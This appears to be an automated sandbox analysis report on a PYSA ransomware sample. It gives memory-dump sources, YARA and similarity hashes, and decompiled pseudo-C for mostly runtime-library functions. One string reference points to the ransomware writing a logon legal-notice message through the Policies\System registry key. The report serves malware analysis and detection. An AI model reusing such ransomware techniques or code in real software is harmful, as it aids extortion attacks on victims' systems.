                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 013CA085
                    • legalnoticetext, xrefs: 013CA0B8
                    • PYSA, xrefs: 013CA0C4
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Value$CloseOpen
                    • String ID: PYSA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$legalnoticecaption$legalnoticetext
                    • API String ID: 3241186055-1127495653
                    • Opcode ID: 509387f8530d929cf7ef29e7b62821c573c5f1226ef92579575f4b0e58078b1f
                    • Instruction ID: f667e2a2fa162952ca8fd70b2ba8639bbe39bf2fbbf00e8af2bdfe82bd1f4441
                    • Opcode Fuzzy Hash: 509387f8530d929cf7ef29e7b62821c573c5f1226ef92579575f4b0e58078b1f
                    • Instruction Fuzzy Hash: C0018470A80218FBDB209F54DC46FBDBF69EB04B04F20419EF9097B1A5C6B26A058B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0140D461(signed int _a4, signed int _a8) {
                    				intOrPtr _v0;
                    				intOrPtr _v4;
                    				signed char _v5;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v44;
                    				void* __ebx;
                    				void* __esi;
                    				signed int _t58;
                    				signed int _t61;
                    				signed int _t62;
                    				signed int _t64;
                    				signed int _t65;
                    				signed int _t68;
                    				signed int _t69;
                    				signed int _t73;
                    				signed int* _t75;
                    				signed int _t82;
                    				signed int _t84;
                    				signed int _t86;
                    				signed int _t87;
                    				signed int _t91;
                    				signed int _t98;
                    				intOrPtr* _t99;
                    				signed int _t108;
                    				signed int _t109;
                    				signed int _t111;
                    				signed int _t112;
                    				intOrPtr _t115;
                    				void* _t119;
                    				signed int _t121;
                    				void* _t124;
                    				signed int _t125;
                    				signed int _t126;
                    				void* _t131;
                    				intOrPtr* _t135;
                    				signed int _t139;
                    				signed int _t141;
                    				void* _t142;
                    				void* _t143;
                    				signed int _t144;
                    				signed int _t146;
                    				signed int* _t147;
                    				signed int _t152;
                    				signed int _t153;
                    				CHAR* _t154;
                    				signed int _t155;
                    				signed int* _t156;
                    				signed int _t157;
                    				signed int _t159;
                    				void* _t164;
                    				void* _t166;
                    				void* _t167;
                    
                    				_t111 = _a4;
                    				if(_t111 != 0) {
                    					_t144 = _t111;
                    					_t58 = E014151A0(_t111, 0x3d);
                    					_v16 = _t58;
                    					_t119 = _t143;
                    					__eflags = _t58;
                    					if(_t58 == 0) {
                    						L10:
                    						 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    						goto L11;
                    					} else {
                    						__eflags = _t58 - _t111;
                    						if(_t58 == _t111) {
                    							goto L10;
                    						} else {
                    							__eflags =  *((char*)(_t58 + 1));
                    							_t152 =  *0x143a610; // 0xaee848
                    							_t62 = _t58 & 0xffffff00 |  *((char*)(_t58 + 1)) == 0x00000000;
                    							_v5 = _t62;
                    							__eflags = _t152 -  *0x143a61c; // 0xaee848
                    							if(__eflags == 0) {
                    								L44();
                    								_t152 = _t62;
                    								_t62 = _v5;
                    								_t119 = _t152;
                    								 *0x143a610 = _t152;
                    							}
                    							_t112 = 0;
                    							__eflags = _t152;
                    							if(_t152 != 0) {
                    								L21:
                    								_t121 = _t144;
                    								_t64 = _v16 - _t121;
                    								_push(_t64);
                    								_push(_t121);
                    								L61();
                    								_v12 = _t64;
                    								__eflags = _t64;
                    								if(_t64 < 0) {
                    									L29:
                    									__eflags = _v5 - _t112;
                    									if(_v5 != _t112) {
                    										goto L12;
                    									} else {
                    										_t65 =  ~_t64;
                    										_v12 = _t65;
                    										_t27 = _t65 + 2; // 0x2
                    										_t124 = _t27;
                    										__eflags = _t124 - _t65;
                    										if(_t124 < _t65) {
                    											goto L11;
                    										} else {
                    											__eflags = _t124 - 0x3fffffff;
                    											if(_t124 >= 0x3fffffff) {
                    												goto L11;
                    											} else {
                    												_push(4);
                    												_push(_t124);
                    												_t153 = E0140D7AC(_t152);
                    												E014012E1(_t112);
                    												_t166 = _t166 + 0x10;
                    												__eflags = _t153;
                    												if(_t153 == 0) {
                    													goto L11;
                    												} else {
                    													_t125 = _v12;
                    													_t144 = _t112;
                    													_t68 = _a4;
                    													 *(_t153 + _t125 * 4) = _t68;
                    													 *(_t153 + 4 + _t125 * 4) = _t112;
                    													goto L34;
                    												}
                    											}
                    										}
                    									}
                    								} else {
                    									__eflags =  *_t152 - _t112;
                    									if( *_t152 == _t112) {
                    										goto L29;
                    									} else {
                    										E014012E1( *((intOrPtr*)(_t152 + _t64 * 4)));
                    										_t141 = _v12;
                    										__eflags = _v5 - _t112;
                    										if(_v5 != _t112) {
                    											while(1) {
                    												__eflags =  *(_t152 + _t141 * 4) - _t112;
                    												if( *(_t152 + _t141 * 4) == _t112) {
                    													break;
                    												}
                    												 *(_t152 + _t141 * 4) =  *(_t152 + 4 + _t141 * 4);
                    												_t141 = _t141 + 1;
                    												__eflags = _t141;
                    											}
                    											_push(4);
                    											_push(_t141);
                    											_t153 = E0140D7AC(_t152);
                    											E014012E1(_t112);
                    											_t166 = _t166 + 0x10;
                    											_t68 = _t144;
                    											__eflags = _t153;
                    											if(_t153 != 0) {
                    												L34:
                    												 *0x143a610 = _t153;
                    											}
                    										} else {
                    											_t68 = _a4;
                    											_t144 = _t112;
                    											 *(_t152 + _t141 * 4) = _t68;
                    										}
                    										__eflags = _a8 - _t112;
                    										if(_a8 == _t112) {
                    											goto L12;
                    										} else {
                    											_t126 = _t68;
                    											_t142 = _t126 + 1;
                    											do {
                    												_t69 =  *_t126;
                    												_t126 = _t126 + 1;
                    												__eflags = _t69;
                    											} while (_t69 != 0);
                    											_v12 = _t126 - _t142 + 2;
                    											_t154 = E014009B2(_t126 - _t142, _t126 - _t142 + 2, 1);
                    											_pop(_t129);
                    											__eflags = _t154;
                    											if(_t154 == 0) {
                    												L42:
                    												E014012E1(_t154);
                    												goto L12;
                    											} else {
                    												_t73 = E01405C86(_t154, _v12, _a4);
                    												_t167 = _t166 + 0xc;
                    												__eflags = _t73;
                    												if(_t73 != 0) {
                    													_push(_t112);
                    													_push(_t112);
                    													_push(_t112);
                    													_push(_t112);
                    													_push(_t112);
                    													E013FDA8E();
                    													asm("int3");
                    													_t164 = _t167;
                    													_push(_t144);
                    													_t146 = _v44;
                    													__eflags = _t146;
                    													if(_t146 != 0) {
                    														_t131 = 0;
                    														_t75 = _t146;
                    														__eflags =  *_t146;
                    														if( *_t146 != 0) {
                    															do {
                    																_t75 =  &(_t75[1]);
                    																_t131 = _t131 + 1;
                    																__eflags =  *_t75;
                    															} while ( *_t75 != 0);
                    														}
                    														_push(_t154);
                    														_t47 = _t131 + 1; // 0x2
                    														_t155 = E014009B2(_t131, _t47, 4);
                    														__eflags = _t155;
                    														if(_t155 == 0) {
                    															L59:
                    															E01401369(_t112, _t142, _t155);
                    															goto L60;
                    														} else {
                    															__eflags =  *_t146;
                    															if( *_t146 == 0) {
                    																L57:
                    																E014012E1(0);
                    																_t86 = _t155;
                    																goto L58;
                    															} else {
                    																_push(_t112);
                    																_t112 = _t155 - _t146;
                    																__eflags = _t112;
                    																do {
                    																	_t135 =  *_t146;
                    																	_t48 = _t135 + 1; // 0x5
                    																	_t142 = _t48;
                    																	do {
                    																		_t87 =  *_t135;
                    																		_t135 = _t135 + 1;
                    																		__eflags = _t87;
                    																	} while (_t87 != 0);
                    																	_t49 = _t135 - _t142 + 1; // 0x6
                    																	_v12 = _t49;
                    																	 *(_t112 + _t146) = E014009B2(_t135 - _t142, _t49, 1);
                    																	E014012E1(0);
                    																	_t167 = _t167 + 0xc;
                    																	__eflags =  *(_t112 + _t146);
                    																	if( *(_t112 + _t146) == 0) {
                    																		goto L59;
                    																	} else {
                    																		_t91 = E01405C86( *(_t112 + _t146), _v12,  *_t146);
                    																		_t167 = _t167 + 0xc;
                    																		__eflags = _t91;
                    																		if(_t91 != 0) {
                    																			L60:
                    																			_push(0);
                    																			_push(0);
                    																			_push(0);
                    																			_push(0);
                    																			_push(0);
                    																			E013FDA8E();
                    																			asm("int3");
                    																			_push(_t164);
                    																			_push(_t112);
                    																			_push(_t155);
                    																			_push(_t146);
                    																			_t147 =  *0x143a610; // 0xaee848
                    																			_t156 = _t147;
                    																			__eflags =  *_t147;
                    																			if( *_t147 == 0) {
                    																				L67:
                    																				_t157 = _t156 - _t147;
                    																				__eflags = _t157;
                    																				_t159 =  ~(_t157 >> 2);
                    																			} else {
                    																				_t115 = _v0;
                    																				do {
                    																					_t82 = E01414113(_v4,  *_t156, _t115);
                    																					_t167 = _t167 + 0xc;
                    																					__eflags = _t82;
                    																					if(_t82 != 0) {
                    																						goto L66;
                    																					} else {
                    																						_t84 =  *((intOrPtr*)(_t115 +  *_t156));
                    																						__eflags = _t84 - 0x3d;
                    																						if(_t84 == 0x3d) {
                    																							L69:
                    																							_t159 = _t156 - _t147 >> 2;
                    																						} else {
                    																							__eflags = _t84;
                    																							if(_t84 == 0) {
                    																								goto L69;
                    																							} else {
                    																								goto L66;
                    																							}
                    																						}
                    																					}
                    																					goto L68;
                    																					L66:
                    																					_t156 =  &(_t156[1]);
                    																					__eflags =  *_t156;
                    																				} while ( *_t156 != 0);
                    																				goto L67;
                    																			}
                    																			L68:
                    																			return _t159;
                    																		} else {
                    																			goto L55;
                    																		}
                    																	}
                    																	goto L70;
                    																	L55:
                    																	_t146 = _t146 + 4;
                    																	__eflags =  *_t146 - _t91;
                    																} while ( *_t146 != _t91);
                    																goto L57;
                    															}
                    														}
                    													} else {
                    														_t86 = 0;
                    														L58:
                    														return _t86;
                    													}
                    												} else {
                    													_t139 = _v16 + 1 + _t154 - _a4;
                    													asm("sbb eax, eax");
                    													 *(_t139 - 1) = _t112;
                    													_t98 = SetEnvironmentVariableA(_t154,  !( ~(_v5 & 0x000000ff)) & _t139);
                    													__eflags = _t98;
                    													if(_t98 == 0) {
                    														_t99 = E013FDB3A();
                    														_t112 = _t112 | 0xffffffff;
                    														__eflags = _t112;
                    														 *_t99 = 0x2a;
                    													}
                    													goto L42;
                    												}
                    											}
                    										}
                    									}
                    								}
                    							} else {
                    								__eflags = _a8;
                    								if(_a8 == 0) {
                    									L14:
                    									__eflags = _t62;
                    									if(_t62 == 0) {
                    										 *0x143a610 = E014009B2(_t119, 1, 4);
                    										E014012E1(_t112);
                    										_t152 =  *0x143a610; // 0xaee848
                    										_t166 = _t166 + 0xc;
                    										__eflags = _t152;
                    										if(_t152 == 0) {
                    											goto L11;
                    										} else {
                    											__eflags =  *0x143a614 - _t112; // 0x0
                    											if(__eflags != 0) {
                    												goto L20;
                    											} else {
                    												 *0x143a614 = E014009B2(_t119, 1, 4);
                    												E014012E1(_t112);
                    												_t166 = _t166 + 0xc;
                    												__eflags =  *0x143a614 - _t112; // 0x0
                    												if(__eflags == 0) {
                    													goto L11;
                    												} else {
                    													goto L19;
                    												}
                    											}
                    										}
                    									} else {
                    										_t112 = 0;
                    										goto L12;
                    									}
                    								} else {
                    									__eflags =  *0x143a614 - _t112; // 0x0
                    									if(__eflags == 0) {
                    										goto L14;
                    									} else {
                    										_t108 = L01403B78(0);
                    										__eflags = _t108;
                    										if(_t108 != 0) {
                    											L19:
                    											_t152 =  *0x143a610; // 0xaee848
                    											L20:
                    											__eflags = _t152;
                    											if(_t152 == 0) {
                    												L11:
                    												_t112 = _t111 | 0xffffffff;
                    												__eflags = _t112;
                    												L12:
                    												E014012E1(_t144);
                    												_t61 = _t112;
                    												goto L13;
                    											} else {
                    												goto L21;
                    											}
                    										} else {
                    											goto L10;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					_t109 = E013FDB3A();
                    					 *_t109 = 0x16;
                    					_t61 = _t109 | 0xffffffff;
                    					L13:
                    					return _t61;
                    				}
                    				L70:
                    			}


                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                    • String ID:
                    • API String ID: 1282221369-0
                    • Opcode ID: 83d71ce25b5ece7dc0296ecfdac727e835511e8f1694e588ddb0eb1b533558a6
                    • Instruction ID: 4aa9859f11dc72afe4352f57e8ef8ad70d928e3bbe696bffe8d4e8e2aba81129
                    • Opcode Fuzzy Hash: 83d71ce25b5ece7dc0296ecfdac727e835511e8f1694e588ddb0eb1b533558a6
                    • Instruction Fuzzy Hash: B06127B1D003016FDB23AFEF88846AA7FA4AF11324F15417FDE98E72E5E63195098794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 56%
                    			E013C2F1B(intOrPtr* __ecx, void* __edx, void* __eflags) {
                    				void* _t43;
                    				void* _t46;
                    				void* _t65;
                    				intOrPtr* _t67;
                    				intOrPtr* _t68;
                    				void* _t82;
                    				intOrPtr _t83;
                    				void* _t84;
                    				intOrPtr _t86;
                    				void* _t87;
                    				void* _t88;
                    				void* _t90;
                    
                    				_t90 = __eflags;
                    				_t82 = __edx;
                    				_t68 = __ecx;
                    				_push(0x5c);
                    				E013F26C2(E014157A4);
                    				_t67 = _t68;
                    				 *((intOrPtr*)(_t87 - 0x1c)) = _t67;
                    				 *((intOrPtr*)(_t87 - 0x10)) =  *((intOrPtr*)(_t87 + 8));
                    				 *((intOrPtr*)(_t87 - 0x18)) =  *((intOrPtr*)(_t87 + 0x14));
                    				 *((intOrPtr*)(_t87 - 0x20)) = _t67;
                    				 *((intOrPtr*)(_t87 - 0x14)) =  *((intOrPtr*)(_t87 + 0x18));
                    				_t83 = E013F21A5(_t90, 0x40);
                    				 *((intOrPtr*)(_t87 - 0x1c)) = _t83;
                    				 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
                    				_t91 = _t83;
                    				if(_t83 == 0) {
                    					_t43 = 0;
                    					__eflags = 0;
                    				} else {
                    					E013F5890(_t83, _t83, 0, 0x40);
                    					_t86 = E013F21A5(_t91, 0x40);
                    					_t88 = _t88 + 0x10;
                    					 *((intOrPtr*)(_t87 - 0x24)) = _t86;
                    					 *(_t87 - 4) = 1;
                    					if(_t86 == 0) {
                    						_t65 = 0;
                    						__eflags = 0;
                    					} else {
                    						E013F5890(_t83, _t86, 0, 0x40);
                    						_t88 = _t88 + 0xc;
                    						_push(0);
                    						_t65 = E013C2E8E(_t86);
                    					}
                    					_push(_t65);
                    					 *(_t87 - 4) = 0;
                    					_t43 = E013C2CEE(_t83);
                    				}
                    				_t16 = _t87 - 4;
                    				 *_t16 =  *(_t87 - 4) | 0xffffffff;
                    				_t93 =  *_t16;
                    				E013CE470(_t82,  *_t16, _t43, 0, 0,  *((intOrPtr*)(_t87 - 0x10)));
                    				_push(0);
                    				_push( *((intOrPtr*)(_t87 - 0x14)));
                    				 *(_t87 - 4) = 2;
                    				 *_t67 = 0x141b670;
                    				 *((intOrPtr*)(_t67 + 4)) = 0x141b764;
                    				_t84 = E013C1B86(_t87 - 0x68);
                    				_push(0);
                    				_push( *((intOrPtr*)(_t87 - 0x18)));
                    				 *(_t87 - 4) = 3;
                    				_t46 = E013C1B86(_t87 - 0x4c);
                    				_push(1);
                    				 *(_t87 - 4) = 4;
                    				_push(_t87 + 0xc);
                    				_push("Uppercase");
                    				_push(_t87 - 0x30);
                    				_t73 = E013C2139();
                    				_push( *(_t49 + 8) & 0x000000ff);
                    				 *(_t87 - 4) = 5;
                    				_push(_t87 + 0x10);
                    				_push("GroupSize");
                    				_t74 = E013C1E98(_t73,  *_t16);
                    				_push( *(_t52 + 8) & 0x000000ff);
                    				_push(_t46);
                    				_push("Separator");
                    				_t75 = E013C1FA8(_t74, _t84, _t93);
                    				_push( *(_t54 + 8) & 0x000000ff);
                    				_push(_t84);
                    				_push("Terminator");
                    				_push(E013C1FA8(_t75, _t84, _t93));
                    				E013E9C60(_t67);
                    				E013C3BEC(_t87 - 0x2c);
                    				 *((intOrPtr*)(_t87 - 0x30)) = 0x141a9ac;
                    				E013C3959(_t87 - 0x40);
                    				E013C3959(_t87 - 0x5c);
                    				return E013F269C(_t67);
                    			}


                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3
                    • String ID: GroupSize$Separator$Terminator$Uppercase
                    • API String ID: 431132790-2439647881
                    • Opcode ID: 524a5c0faeb681adfa7b269ee50ead68151ac16307f1bebc688a22bca3dee1f6
                    • Instruction ID: 143151289e49c686d176d2d33f2c83c8ea39fbba9f6015dfb148e29070cd30ce
                    • Opcode Fuzzy Hash: 524a5c0faeb681adfa7b269ee50ead68151ac16307f1bebc688a22bca3dee1f6
                    • Instruction Fuzzy Hash: 40418971E0030AEEEB10EBA9CC05BEEBAB4AF65B08F14405DE614BB281D7B44D059B65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E014148BB(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                    				signed int _v8;
                    				char _v22;
                    				struct _cpinfo _v28;
                    				short* _v32;
                    				int _v36;
                    				char* _v40;
                    				int _v44;
                    				intOrPtr _v48;
                    				void* _v60;
                    				void* __ebp;
                    				signed int _t63;
                    				short* _t68;
                    				int _t70;
                    				signed int _t72;
                    				short* _t73;
                    				signed int _t76;
                    				short* _t86;
                    				int _t93;
                    				intOrPtr _t95;
                    				intOrPtr _t96;
                    				signed int _t106;
                    				char* _t108;
                    				char* _t109;
                    				void* _t114;
                    				void* _t115;
                    				intOrPtr _t116;
                    				intOrPtr _t117;
                    				intOrPtr* _t118;
                    				short* _t119;
                    				int _t120;
                    				int _t121;
                    				short* _t122;
                    				intOrPtr* _t123;
                    				signed int _t124;
                    				short* _t125;
                    
                    				_t63 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t63 ^ _t124;
                    				_t120 = _a20;
                    				_v44 = _a4;
                    				_v48 = _a8;
                    				_t67 = _a24;
                    				_v40 = _a24;
                    				_t118 = _a16;
                    				_v36 = _t118;
                    				if(_t120 <= 0) {
                    					if(_t120 >= 0xffffffff) {
                    						goto L2;
                    					} else {
                    						goto L5;
                    					}
                    				} else {
                    					_t120 = E014012C5(_t118, _t120);
                    					_t67 = _v40;
                    					L2:
                    					_t93 = _a28;
                    					if(_t93 <= 0) {
                    						if(_t93 < 0xffffffff) {
                    							goto L5;
                    						} else {
                    							goto L7;
                    						}
                    					} else {
                    						_t93 = E014012C5(_t67, _t93);
                    						L7:
                    						_t70 = _a32;
                    						if(_t70 == 0) {
                    							_t70 =  *( *_v44 + 8);
                    							_a32 = _t70;
                    						}
                    						if(_t120 == 0 || _t93 == 0) {
                    							if(_t120 != _t93) {
                    								if(_t93 <= 1) {
                    									if(_t120 <= 1) {
                    										if(GetCPInfo(_t70,  &_v28) == 0) {
                    											goto L5;
                    										} else {
                    											if(_t120 <= 0) {
                    												if(_t93 <= 0) {
                    													goto L36;
                    												} else {
                    													_t68 = 2;
                    													if(_v28 >= _t68) {
                    														_t108 =  &_v22;
                    														if(_v22 != 0) {
                    															_t123 = _v40;
                    															while(1) {
                    																_t116 =  *((intOrPtr*)(_t108 + 1));
                    																if(_t116 == 0) {
                    																	goto L15;
                    																}
                    																_t95 =  *_t123;
                    																if(_t95 <  *_t108 || _t95 > _t116) {
                    																	_t108 = _t108 + _t68;
                    																	if( *_t108 != 0) {
                    																		continue;
                    																	} else {
                    																		goto L15;
                    																	}
                    																}
                    																goto L63;
                    															}
                    														}
                    													}
                    													goto L15;
                    												}
                    											} else {
                    												_t68 = 2;
                    												if(_v28 >= _t68) {
                    													_t109 =  &_v22;
                    													if(_v22 != 0) {
                    														while(1) {
                    															_t117 =  *((intOrPtr*)(_t109 + 1));
                    															if(_t117 == 0) {
                    																goto L17;
                    															}
                    															_t96 =  *_t118;
                    															if(_t96 <  *_t109 || _t96 > _t117) {
                    																_t109 = _t109 + _t68;
                    																if( *_t109 != 0) {
                    																	continue;
                    																} else {
                    																	goto L17;
                    																}
                    															}
                    															goto L63;
                    														}
                    													}
                    												}
                    												goto L17;
                    											}
                    										}
                    									} else {
                    										L17:
                    										_push(3);
                    										goto L13;
                    									}
                    								} else {
                    									L15:
                    									_t68 = 1;
                    								}
                    							} else {
                    								_push(2);
                    								L13:
                    								_pop(_t68);
                    							}
                    						} else {
                    							L36:
                    							_t119 = 0;
                    							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t120, 0, 0);
                    							_v44 = _t72;
                    							if(_t72 == 0) {
                    								L5:
                    								_t68 = 0;
                    							} else {
                    								_t114 = _t72 + _t72;
                    								asm("sbb eax, eax");
                    								if((_t114 + 0x00000008 & _t72) == 0) {
                    									_t73 = 0;
                    									_v32 = 0;
                    									goto L45;
                    								} else {
                    									asm("sbb eax, eax");
                    									_t84 = _t72 & _t114 + 0x00000008;
                    									_t106 = _t114 + 8;
                    									if((_t72 & _t114 + 0x00000008) > 0x400) {
                    										asm("sbb eax, eax");
                    										_t86 = E0140131B(_t106, _t84 & _t106);
                    										_v32 = _t86;
                    										if(_t86 == 0) {
                    											goto L61;
                    										} else {
                    											 *_t86 = 0xdddd;
                    											goto L43;
                    										}
                    									} else {
                    										asm("sbb eax, eax");
                    										E013F2CE0();
                    										_t86 = _t125;
                    										_v32 = _t86;
                    										if(_t86 == 0) {
                    											L61:
                    											_t94 = _v32;
                    										} else {
                    											 *_t86 = 0xcccc;
                    											L43:
                    											_t73 =  &(_t86[4]);
                    											_v32 = _t73;
                    											L45:
                    											if(_t73 == 0) {
                    												goto L61;
                    											} else {
                    												_t121 = _a32;
                    												if(MultiByteToWideChar(_t121, 1, _v36, _t120, _t73, _v44) == 0) {
                    													goto L61;
                    												} else {
                    													_t76 = MultiByteToWideChar(_t121, 9, _v40, _t93, _t119, _t119);
                    													_v36 = _t76;
                    													if(_t76 == 0) {
                    														goto L61;
                    													} else {
                    														_t115 = _t76 + _t76;
                    														_t102 = _t115 + 8;
                    														asm("sbb eax, eax");
                    														if((_t115 + 0x00000008 & _t76) == 0) {
                    															_t122 = _t119;
                    															goto L56;
                    														} else {
                    															asm("sbb eax, eax");
                    															_t80 = _t76 & _t115 + 0x00000008;
                    															_t102 = _t115 + 8;
                    															if((_t76 & _t115 + 0x00000008) > 0x400) {
                    																asm("sbb eax, eax");
                    																_t122 = E0140131B(_t102, _t80 & _t102);
                    																_pop(_t102);
                    																if(_t122 == 0) {
                    																	goto L59;
                    																} else {
                    																	 *_t122 = 0xdddd;
                    																	goto L54;
                    																}
                    															} else {
                    																asm("sbb eax, eax");
                    																E013F2CE0();
                    																_t122 = _t125;
                    																if(_t122 == 0) {
                    																	L59:
                    																	_t94 = _v32;
                    																} else {
                    																	 *_t122 = 0xcccc;
                    																	L54:
                    																	_t122 =  &(_t122[4]);
                    																	L56:
                    																	if(_t122 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t93, _t122, _v36) == 0) {
                    																		goto L59;
                    																	} else {
                    																		_t94 = _v32;
                    																		_t119 = E01406D92(_t102, _v48, _a12, _v32, _v44, _t122, _v36, _t119, _t119, _t119);
                    																	}
                    																}
                    															}
                    														}
                    														E013F1B60(_t122);
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    								E013F1B60(_t94);
                    								_t68 = _t119;
                    							}
                    						}
                    					}
                    				}
                    				L63:
                    				return E013F268B(_t68, _v8 ^ _t124);
                    			}

                    APIs
                    • GetCPInfo.KERNEL32(00AEE848,00AEE848,?,7FFFFFFF,?,?,01414B94,00AEE848,00AEE848,?,00AEE848,?,?,?,?,00AEE848), ref: 01414967
                    • MultiByteToWideChar.KERNEL32(00AEE848,00000009,00AEE848,00AEE848,00000000,00000000,?,01414B94,00AEE848,00AEE848,?,00AEE848,?,?,?,?), ref: 014149EA
                    • MultiByteToWideChar.KERNEL32(00AEE848,00000001,00AEE848,00AEE848,00000000,01414B94,?,01414B94,00AEE848,00AEE848,?,00AEE848,?,?,?,?), ref: 01414A7D
                    • MultiByteToWideChar.KERNEL32(00AEE848,00000009,00AEE848,00AEE848,00000000,00000000,?,01414B94,00AEE848,00AEE848,?,00AEE848,?,?,?,?), ref: 01414A94
                      • Part of subcall function 0140131B: HeapAlloc.KERNEL32(00000000,?,00000000,?,014013C1,?,00000000,?,00000003,01406A84), ref: 0140134D
                    • MultiByteToWideChar.KERNEL32(00AEE848,00000001,00AEE848,00AEE848,00000000,00AEE848,?,01414B94,00AEE848,00AEE848,?,00AEE848,?,?,?,?), ref: 01414B10
                    • __freea.LIBCMT ref: 01414B3B
                    • __freea.LIBCMT ref: 01414B47
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$__freea$AllocHeapInfo
                    • String ID:
                    • API String ID: 2171645-0
                    • Opcode ID: 4bc49f9499b04348651b192d504422efb1b26fff651adefe27b884b140eafcdf
                    • Instruction ID: 23ab52767f18360f1a82a4619b0cec6bfddb5f7d908e7a83e7d682849ee101bb
                    • Opcode Fuzzy Hash: 4bc49f9499b04348651b192d504422efb1b26fff651adefe27b884b140eafcdf
                    • Instruction Fuzzy Hash: CC91D472E102169AEF218E79C840FEFBFA6AF04754F1C415BEA15EB268D735D841C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E0140E31D(void* __edx, char _a4) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				char _v28;
                    				void* _t53;
                    				void _t57;
                    				intOrPtr _t58;
                    				intOrPtr _t59;
                    				intOrPtr _t60;
                    				intOrPtr _t61;
                    				signed int _t64;
                    				signed int _t76;
                    				signed int _t78;
                    				signed int _t82;
                    				signed int _t86;
                    				char _t92;
                    				char _t100;
                    				void* _t101;
                    				signed int _t104;
                    				void* _t107;
                    				void* _t121;
                    				char* _t123;
                    				signed int _t127;
                    				intOrPtr* _t132;
                    				void* _t133;
                    				intOrPtr* _t134;
                    				char* _t139;
                    
                    				_t121 = __edx;
                    				_t100 = _a4;
                    				_v28 = _t100;
                    				_v24 = 0;
                    				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
                    					_v16 = 1;
                    					_t53 = E014009B2(_t101, 1, 0x50);
                    					_v8 = _t53;
                    					if(_t53 != 0) {
                    						_t104 = 0x14;
                    						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
                    						_t132 = E0140131B(0, 4);
                    						_t127 = 0;
                    						_v12 = _t132;
                    						E014012E1(0);
                    						_pop(_t107);
                    						if(_t132 != 0) {
                    							 *_t132 = 0;
                    							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
                    								_t133 = _v8;
                    								_t57 =  *0x1435348; // 0x1435340
                    								 *_t133 = _t57;
                    								_t58 =  *0x143534c; // 0x143a4f0
                    								 *((intOrPtr*)(_t133 + 4)) = _t58;
                    								_t59 =  *0x1435350; // 0x143a4f0
                    								 *((intOrPtr*)(_t133 + 8)) = _t59;
                    								_t60 =  *0x1435378; // 0x1435344
                    								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
                    								_t61 =  *0x143537c; // 0x143a4f4
                    								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
                    								L19:
                    								 *_v12 = 1;
                    								if(_t127 != 0) {
                    									 *_t127 = 1;
                    								}
                    								goto L21;
                    							}
                    							_t134 = E0140131B(_t107, 4);
                    							_v20 = _t134;
                    							E014012E1(0);
                    							if(_t134 == 0) {
                    								L11:
                    								E014012E1(_v8);
                    								E014012E1(_v12);
                    								return _v16;
                    							}
                    							_push(_v8);
                    							 *_t134 = 0;
                    							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
                    							_t76 = E01409B26(_t121);
